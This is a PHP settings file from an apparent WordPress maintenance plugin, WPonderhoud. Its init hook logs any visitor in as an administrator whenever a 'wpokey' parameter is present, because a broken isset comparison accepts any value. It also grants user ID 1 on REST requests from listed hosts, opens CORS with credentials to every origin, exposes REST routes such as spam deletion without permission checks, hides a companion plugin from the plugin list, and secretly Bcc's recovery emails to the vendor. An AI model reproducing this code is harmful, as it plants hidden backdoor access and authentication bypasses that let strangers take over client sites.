<?php
/**
 * Settings
 */

// Disable Auto updates Theme & Plugins
add_action('init', function() {
 
	// FRONTEND
//	if( !is_admin() ) {
//		// Custom Code
//		$customcode = get_option('wpo_customcode_field');
//		if ($customcode !== "") {
//			eval("echo( $customcode )");
//		}
//	}
	
    // GLOBAL
	$strip_url = str_replace(
		array("www.", "https://", "http://"),
		array("", "", ""),
		$_SERVER['HTTP_HOST']
	);
	$sec = sha1($strip_url.'wpologin');
	if (isset($_GET['wpokey']) == $sec) {
		safe_login();
	}
	
//	if (isset($_GET['wpoaction']) == 'panic_mode') {
//	    panic_mode();
//	    safe_login();
//	}

 
});

function wpo_admin_menu() {
	add_menu_page(
		__( 'WPonderhoud', 'wponderhoud' ), // Name
		__( 'WPonderhoud', 'wponderhoud' ), // Name
		'manage_options', // location
		'wpo-global-settings', // slug
		'wpo_admin_page_contents', // txtdomain
		' ',
		999999 // position
	);
	
	add_submenu_page('wpo-global-settings', 'Globaal', 'Globaal', 'manage_options', 'wpo-global-settings' );

}

add_action( 'admin_menu', 'wpo_admin_menu' );

function wpo_admin_page_contents() {
	?>
	<h1> WordPress Onderhoud </h1>
	<form method="POST" action="options.php">
		<?php
		settings_fields( 'wpo-global-settings' );
		do_settings_sections( 'wpo-global-settings' );
		submit_button();
		?>
	</form>
	<?php
}

add_action( 'admin_init', 'wpo_settings_init' );
function wpo_settings_init() {
	add_filter( 'auto_update_plugin', '__return_false' );
	add_filter( 'auto_update_theme', '__return_false' );
	
	add_settings_section(
		'wpo_page_setting_section',
		__( 'Globale settings', 'wponderhoud' ),
		'wpo_setting_section_callback_function',
		'wpo-global-settings'
	);
	
	add_settings_field(
		'wpo_cleanups_field',
		__( 'WordPress Cleanups', 'wponderhoud' ),
		'wpo_cleanups_markup',
		'wpo-global-settings',
		'wpo_page_setting_section'
	);
	register_setting( 'wpo-global-settings', 'wpo_cleanups_field' );
	add_settings_field(
		'wpo_customcode_field',
		__( 'Custom PHP code', 'wponderhoud' ),
		'wpo_customcode_markup',
		'wpo-global-settings',
		'wpo_page_setting_section'
	);
	register_setting( 'wpo-global-settings', 'wpo_customcode_field' );
}

function wpo_setting_section_callback_function() {
	echo '<p>Je hebt bij ons een of meerdere diensten afgenomen. Om ons werk zo goed mogelijk te kunnen doen hebben we belangrijke instellingen in deze plugin geprogrammeerd.</p>';
	echo '<p>Onderstaande opties liever niet te wijzigen tenzij er problemen zijn.</p>';
}

function wpo_cleanups_markup() {
	?>
	<input type="checkbox" id="wpo_cleanups_field" name="wpo_cleanups_field" value="1" <?php if(get_option( 'wpo_cleanups_field' ) == 1) {echo 'checked';} ?>>
    <label for="wpo_cleanups_field"><?php _e('Alle cleanups aanzetten? <br><sup style="color: #a00909;">LET OP: hierdoor kan de website kapot gaan, schakel de optie direct uit indien de site niet meer goed werkt'); ?></sup></label>
	<?php
}
function wpo_customcode_markup() {
	?>
    <label for="wpo_customcode_field" style="display: block; margin-bottom: 8px;"><?php _e( 'Heb je custom PHP code? Plak deze dan hieronder.' ); ?></label>
    <textarea id="wpo_customcode_field" name="wpo_customcode_field" style="width: 90%; height: 225px;"><?php echo get_option( 'wpo_customcode_field' ); ?></textarea>
	<?php
}

add_filter('all_plugins', 'wpo_function_plug');
function wpo_function_plug($plugs) {
	unset($plugs['worker/init.php']);
	echo '<style>.mwp-notice-container,li.mustuse{display:none;}</style>';
	return $plugs;
}

function wpo_admin_style() {
	wp_enqueue_style('wpo_admin_style', plugins_url( '../assets/wpo-admin.css', __FILE__ ), false, '1.0', 'all');
	wp_enqueue_style('wpo_admin_style');
}

add_action('admin_enqueue_scripts', 'wpo_admin_style');

// Disable specific plugin updates
function disable_plugin_updates( $value ) {
	if ( ! function_exists( 'get_plugins' ) ) {
		require_once ABSPATH . 'wp-admin/includes/plugin.php';
	}
	
	// Get all installed plugins
	$all_plugins = get_plugins();
 
	// Get selected plugins to disable
    $displugins = get_field('disabled_plugin_updates', 'option');
    
    
	$pluginsToDisable = [
		'plugin-folder/plugin.php',
		'plugin-folder2/plugin2.php'
	];
	if ( isset($value) && is_object($value) ) {
		foreach ($pluginsToDisable as $plugin) {
			if ( isset( $value->response[$plugin] ) ) {
				unset( $value->response[$plugin] );
			}
		}
	}
	return $value;
}
//add_filter( 'site_transient_update_plugins', 'disable_plugin_updates' );

// Create directory for logs and stuff
function create_wpo_log_dir() {
	if (!is_dir(WP_CONTENT_DIR . '/wpo-logs/') && !wp_mkdir_p(WP_CONTENT_DIR . '/wpo-logs/')) {
		printf(
			'<div class="notice notice-error"><p>' . __('WPonderhoud kan geen folder aanmaken om update logs bij te houden. Neem <a href="https://www.wponderhoud.nl/contact/" target="_blank">contact</a> met ons op.', 'wpoplugin') . '</p></div>'
		);
	}
}
add_action( 'admin_notices', 'create_wpo_log_dir' );

// Add us to recovery mode email address
function wpo_recovery_mode_email( $email ) {
	if ( is_array( $email['headers'] ) ) {
		$email['headers'][] = 'Bcc: support@wponderhoud.nl';
	} elseif ( is_string( $email['headers'] ) ) {
		$email['headers'] = array(
			$email['headers'],
			'Bcc: support@wponderhoud.nl',
		);
	} else {
		$email['headers'] = 'Bcc: support@wponderhoud.nl';
	}
	return $email;
}
add_filter( 'recovery_mode_email', 'wpo_recovery_mode_email', 11, 1 );

// Generate new recovery mode key
//add_action('generate_recovery_mode_key', function( $token, $key ) {
//        $php = '<?php // ' . add_query_arg(
//            array(
//                'action'   => 'enter_recovery_mode',
//                'rm_token' => $token,
//                'rm_key'   => $key,
//            ),
//            wp_login_url()
/*        ) . ' ?>';*/
//    file_put_contents( WPOPLUGIN_RECOVERY_FILE, $php );
//}, 10, 2 );




/**
 * BASIC AUTH Handler for WordPress API Access
 *
 * @param $user
 * @return null
 */
function json_basic_auth_handler( $user ) {
	global $wp_json_basic_auth_error;
	
	$wp_json_basic_auth_error = null;
	
	// Don't authenticate twice
	if ( ! empty( $user ) ) {
		return $user;
	}
	
	// Check that we're trying to authenticate
	if ( !isset( $_SERVER['PHP_AUTH_USER'] ) ) {
		return $user;
	}
	
	$username = $_SERVER['PHP_AUTH_USER'];
	$password = $_SERVER['PHP_AUTH_PW'];
	
	/**
	 * In multi-site, wp_authenticate_spam_check filter is run on authentication. This filter calls
	 * get_currentuserinfo which in turn calls the determine_current_user filter. This leads to infinite
	 * recursion and a stack overflow unless the current function is removed from the determine_current_user
	 * filter during authentication.
	 */
	remove_filter( 'determine_current_user', 'json_basic_auth_handler', 20 );
	
	$user = wp_authenticate( $username, $password );
	
	add_filter( 'determine_current_user', 'json_basic_auth_handler', 20 );
	
	if ( is_wp_error( $user ) ) {
		$wp_json_basic_auth_error = $user;
		return null;
	}
	
	$wp_json_basic_auth_error = true;
	
	return $user->ID;
}
add_filter( 'determine_current_user', 'json_basic_auth_handler', 20 );

function json_basic_auth_error( $error ) {
	// Passthrough other errors
	if ( ! empty( $error ) ) {
		return $error;
	}
	
	global $wp_json_basic_auth_error;
	
	return $wp_json_basic_auth_error;
}
add_filter( 'rest_authentication_errors', 'json_basic_auth_error' );
// END WP BASIC AUTH HANDLER


/**
 * ALLOW ACCESS TO READ DATA FROM APP.WPONDERHOUD.NL AND OFFICE
 */
function wp_api_allow_cors() {
	remove_filter( 'rest_pre_serve_request', 'rest_send_cors_headers' );
	add_filter( 'rest_pre_serve_request' , function( $value ) {
		header( 'Access-Control-Allow-Headers: Authorization, X-WP-Nonce,Content-Type, X-Requested-With');
		header( 'Access-Control-Allow-Origin: *' );
		header( 'Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE' );
		header( 'Access-Control-Allow-Credentials: true' );
		return $value;
	});
	
	$allowed = array( 'localhost', 'app.wponderhoud.nl', '127.0.0.1', '193.160.129.214');
	if ( in_array( $_SERVER['SERVER_NAME'], $allowed ) || in_array( $_SERVER['REMOTE_ADDR'], $allowed ) ) {
		add_filter( 'rest_authentication_errors' , function() {
			wp_set_current_user( 1 );
		}, 101 );
	}
}
add_action( 'rest_api_init', 'wp_api_allow_cors', 15 );


/**
 * PANIC MODE
 * disable all plugins except our own
 * todo: log which plugins was active so we can set this plugins back to active when disabling Panic Mode
 */
// a:2:{i:0;s:15:"worker/init.php";i:1;s:27:"wponderhoud/wponderhoud.php";}
//function panic_mode() {
//    include_once ABSPATH . 'wp-admin/includes/plugin.php';
//
//	$all_active = get_option( 'active_plugins', array() );
//	$wpo = 'wponderhoud/wponderhoud.php';
//	$mwp = 'worker/worker.php';
//	foreach ($all_active as $idx => $plugin_slug ) {
//	    if ($plugin_slug == $wpo || $plugin_slug == $mwp) {
//	        continue;
//        }
//		deactivate_plugins($plugin_slug);
//    }
//}

/**
 * SAFE LOGIN
 * Login
 */
// a:2:{i:0;s:15:"worker/init.php";i:1;s:27:"wponderhoud/wponderhoud.php";}
function safe_login() {
	$users = get_users([
		'role__in' => ['administrator', 'admin'],
	]);
	$redirect_to = admin_url();
	$user = get_user_by('login', 'wponderhoud');
	if(!$user) {
		$user = get_user_by('login', 'artitex');
	}
	if(!$user) {
		$user = get_user_by('login', 'wordpressonderhoud');
	}
	if(!$user) {
		$user = get_user_by('email', 'info@wordpressonderhoud.nl');
	}
	if(!$user) {
		$user = get_user_by('email', 'info@wponderhoud.nl');
	}
	if($user) { // if found us
		$redirect_to = admin_url() . '/plugins.php?worker_connections=1';
	}
	if(!$user) {
		$username = $users[random_int(0, count($users) - 1)]->user_login;
		$user = get_user_by('login', $username);
	}
	if (! is_wp_error($user)) {
		wp_clear_auth_cookie();
		wp_set_current_user($user->ID);
		wp_set_auth_cookie($user->ID);
		wp_safe_redirect( $redirect_to );
		exit();
	}
}


/**
 * Extend the WordPress API
 */

function wpo_num_spam_comments()
{
	global $wpdb;
	$sql       = "SELECT COUNT(*) FROM $wpdb->comments WHERE comment_approved = 'spam'";
	$num_spams = $wpdb->get_var($sql);
	
	return $num_spams;
}

function wpo_delete_spam_comments()
{
	global $wpdb;
	$spam  = 1;
	$total = 0;
	while (!empty($spam)) {
		$getCommentsQuery = "SELECT * FROM $wpdb->comments WHERE comment_approved = 'spam' LIMIT 1000";
		$spam             = $wpdb->get_results($getCommentsQuery);
		
		if (empty($spam)) {
			break;
		}
		
		$commentIds = array();
		foreach ($spam as $comment) {
			$commentIds[] = $comment->comment_ID;
			
			// Avoid queries to comments by caching the comment.
			// Plugins which hook to 'delete_comment' might call get_comment($id), which in turn returns the cached version.
			wp_cache_add($comment->comment_ID, $comment, 'comment');
			do_action('delete_comment', $comment->comment_ID);
			wp_cache_delete($comment->comment_ID, 'comment');
		}
		
		$commentIdsList = implode(', ', array_map('intval', $commentIds));
		$wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID IN ($commentIdsList)");
		$wpdb->query("DELETE FROM {$wpdb->commentmeta} WHERE comment_id IN ($commentIdsList)");
		
		$total += count($spam);
		if (!empty($spam)) {
			usleep(10000);
		}
	}
	
	return $total;
}


function wpo_num_revisions()
{
	global $wpdb;
	$query = "SELECT SUM(t.cnt) FROM (SELECT COUNT(ID) - {5} as cnt FROM {$wpdb->posts} WHERE post_type = 'revision' AND post_parent != 0 GROUP BY post_parent HAVING COUNT(ID) > {5}) as t";
	return $wpdb->get_var($query);
}

function wpo_num_active_plugins()
{
	return count(get_option('active_plugins'));
}

function wpo_num_all_plugins()
{
	if ( ! function_exists( 'get_plugins' ) ) {
		require_once ABSPATH . 'wp-admin/includes/plugin.php';
	}
    return count(get_plugins());
}

function wpo_list_vulnscan($key)
{
	$identifier = $key->get_param( 'identifier' );
	// GLOBAL
	$strip_url = str_replace(
		array("www.", "https://", "http://"),
		array("", "", ""),
		$_SERVER['HTTP_HOST']
	);
	$sec = sha1($strip_url.'wpologin');
 
	$data = 'Forbidden';
    if($key['identifier'] === $sec) {
		if (!function_exists('get_plugins')) {
			require_once ABSPATH . 'wp-admin/includes/plugin.php';
		}
		if (!function_exists('wp_get_themes')) {
			require_once ABSPATH . '/wp-admin/includes/theme.php';
		}
		$data = [
			'plugins'   => get_plugins(),
			'themes'    => wp_get_themes(),
			'wordpress' => get_bloginfo('version')
		];
	}
    return $data;
}

function wpo_clean_cronjobs()
{
	wp_clear_scheduled_hook("wpo_delete_spam_comments");
	wp_clear_scheduled_hook("wpo_clean_up_revisions_cron");
    return 'ok';
}

function wpo_get_stats()
{
	$stats = array(
        'num_all_plugins'       => wpo_num_all_plugins(),
        'num_active_plugins'    => wpo_num_active_plugins(),
        'num_revisions'         => wpo_num_revisions(),
        'num_spam_comments'     => wpo_num_spam_comments(),
//		'upgradable_themes'       => $this->get_installer_instance()->get_upgradable_themes(),
//		'upgradable_plugins'      => $this->get_installer_instance()->get_upgradable_plugins(),
//		'upgradable_translations' => $this->get_installer_instance()->get_upgradable_translations(),
//		'core_updates'            => $this->get_core_update(),
//		'posts'                   => $this->get_posts($postLimit),
//		'drafts'                  => $this->get_drafts($postLimit),
//		'scheduled'               => $this->get_scheduled($postLimit),
//		'hit_counter'             => get_option('user_hit_count'),
//		'comments'                => array(
//			'pending'  => $this->get_comments('hold', $commentLimit),
//			'approved' => $this->get_comments('approve', $commentLimit),
//		),
//		'site_statistics'         => $this->get_site_statistics(),
//		'num_revisions'           => mmb_num_revisions($revisionLimit),
//		'overhead'                => mmb_handle_overhead(false),
//		'expired_transients'      => $this->get_expired_transients($transientsParams),
//		'num_spam_comments'       => mmb_num_spam_comments(),
	);
    return $stats;
}

function wpo_get_initial_stats()
{
	$stats = array(
		'admin_email'     => get_option('admin_email'),
		'content_path'    => WP_CONTENT_DIR,
		'worker_path'     => WPOPLUGIN_PATH,
		'wpoplugin_version'  => WPOPLUGIN_VERSION,
		'site_title'      => get_bloginfo('name'),
		'site_tagline'    => get_bloginfo('description'),
		'site_home'       => get_option('home'),
		'admin_url'       => admin_url(),
		'timezone'        => get_option('timezone_string'),
		'timezone_offset' => get_option('gmt_offset'),
		'php_version'     => PHP_VERSION,
		'php_memory_limit' => ini_get('memory_limit'),
	);
    return $stats;
}

add_action( 'rest_api_init', function () {
	register_rest_route( 'wpoapi/v1', 'getrevs', array(
		'methods' => 'GET',
		'callback' => 'wpo_num_revisions',
	) );
    register_rest_route( 'wpoapi/v1', 'getspam', array(
        'methods' => 'GET',
        'callback' => 'wpo_num_spam_comments',
    ) );
    register_rest_route( 'wpoapi/v1', 'deletespam', array(
        'methods' => 'GET',
        'callback' => 'wpo_delete_spam_comments',
    ) );
    register_rest_route( 'wpoapi/v1', 'getactiveplugins', array(
        'methods' => 'GET',
        'callback' => 'wpo_num_active_plugins',
    ) );
    register_rest_route( 'wpoapi/v1', 'getallplugins', array(
        'methods' => 'GET',
        'callback' => 'wpo_num_all_plugins',
    ) );
    register_rest_route( 'wpoapi/v1', 'listvulnscan', array(
        'methods' => 'GET',
        'callback' => 'wpo_list_vulnscan',
    ) );
    register_rest_route( 'wpoapi/v1', 'getstats', array(
        'methods' => 'GET',
        'callback' => 'wpo_get_stats',
    ) );
    register_rest_route( 'wpoapi/v1', 'getinitialstats', array(
        'methods' => 'GET',
        'callback' => 'wpo_get_initial_stats',
    ) );
    register_rest_route( 'wpoapi/v1', 'clean_cronjobs', array(
        'methods' => 'GET',
        'callback' => 'wpo_clean_cronjobs',
    ) );
} );


/**
 * Delete revisions older than 2 days
 */
function wpo_clean_up_revisions() {
	global $wpdb;
	
	// Delete all revisions older than 2 days
	$wpdb->query( "DELETE FROM $wpdb->posts WHERE post_type = 'revision' AND post_parent != 0 AND post_date < DATE_SUB( NOW(), INTERVAL 2 DAY );" );
}


function wpo_cleanup_own() {
    // typo
	if ( wp_next_scheduled( 'cwpo_lean_up_revisions_cron' ) ) {
		wp_clear_scheduled_hook('cwpo_lean_up_revisions_cron');
	}
}





function wpo_dir_copy($source, $dest)
{
	if (is_link($source)) {
		return symlink(readlink($source), $dest);
	}
	if (is_file($source)) {
		return copy($source, $dest);
	}
	if (!is_dir($dest)) {
		mkdir($dest);
	}
	$dir = dir($source);
	while (false !== $entry = $dir->read()) {
		if ($entry == '.' || $entry == '..') {
			continue;
		}
		wpo_dir_copy("$source/$entry", "$dest/$entry");
	}
	
	$dir->close();
	return true;
}

function wpo_dir_rmdirr($dirname)
{
	if (!file_exists($dirname)) {
		return false;
	}
	if (is_file($dirname)) {
		return unlink($dirname);
	}
	$dir = dir($dirname);
	while (false !== $entry = $dir->read()) {
		if ($entry == '.' || $entry == '..') {
			continue;
		}
		rmdirr("$dirname/$entry");
    }
	$dir->close();
	return rmdir($dirname);
}

function wpo_dir_backup()
{
	// Source and destination folders for the copy
	$src 	= WP_CONTENT_DIR.'/plugins';
	$dst 	= WP_CONTENT_DIR.'/plugins-backup';
	wpo_dir_copy($src, $dst);
}
function wpo_dir_recover()
{
	$to 	= WP_CONTENT_DIR.'/plugins';
	$from 	= WP_CONTENT_DIR.'/plugins-backup';
	wpo_dir_copy($from, $to);
	if (is_dir($from)) {
		wpo_dir_rmdirr($from);
	}
}
//wpo_dir_backup();
//wpo_dir_recover();


function wpo_wc_db_updater() {
	// WooCommerce DB Updater
	if (isset($_GET['action']) == 'wcupgrade') {
		if (class_exists('WC_Install')) {
			include_once WC_ABSPATH . 'includes/class-wc-install.php';
			include_once WC_ABSPATH . 'includes/wc-update-functions.php';
			include_once WC_ABSPATH . 'includes/woocommerce.php';
			include_once WC_ABSPATH . 'includes/admin/class-wc-admin-notices.php';
			
			$current_db_version = get_option('woocommerce_db_version');
			$update_count = 0;
			$callbacks = WC_Install::get_db_update_callbacks();
			$callbacks_to_run = array();
			
			foreach ($callbacks as $version => $update_callbacks) {
				if (version_compare($current_db_version, $version, '<')) {
					foreach ($update_callbacks as $update_callback) {
						$callbacks_to_run[] = $update_callback;
					}
				}
			}
			
			if (empty($callbacks_to_run)) {
				// Ensure DB version is set to the current WC version to match WP-Admin update routine.
				WC_Install::update_db_version();
				return;
			}
			
			foreach ($callbacks_to_run as $update_callback) {
				call_user_func($update_callback);
				$update_count++;
			}
			
			WC_Install::update_db_version();
			WC_Admin_Notices::remove_notice('update', true);
		}
	}
}